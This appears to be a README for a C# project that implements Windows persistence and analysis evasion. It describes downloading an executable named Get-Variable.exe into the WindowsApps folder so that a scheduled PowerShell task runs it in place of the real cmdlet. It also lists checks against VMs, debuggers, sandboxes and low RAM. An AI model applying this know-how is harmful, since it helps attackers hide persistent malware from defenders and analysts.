This reposiorty contains the c# code which is using latest persistence technique and multiple anti-vm, anti-sandboxes techniques. In this program, I am using 4 anti-vm and anti-sanboxe techniques, I am also using persistence technique using powershell and task scheduler.
- Downloading an Exe from webserver using webclient in WindowsApps Folder.
- Exe is downloading with the name Get-Variable.exe in WindowsApps Folder.
- Creating a task in scheduler execute Get-Variable command in powershell which is legitimate cmdlet gets the PowerShell variables in the current console.
- After executing this our downloaded binary will execute rathar than powereshell cmdlet.
- This is because when we place any exe in windowsapps folder with name Get-variable, Poweshell will execute this exe rather than kegit command.
- Getting Ram size if it is less than 4 gb program will terminate.
- Checking if the exe is running in VMware or VirtualBox it will terminate.
- Checking the debuger is present, it will terminate.
- Checking if the exe is running in sandbox it will terminate.
- You can add memory insertion technique to bypass sandboxes.
- You cam add human interaction techniques to bypass sndboxes.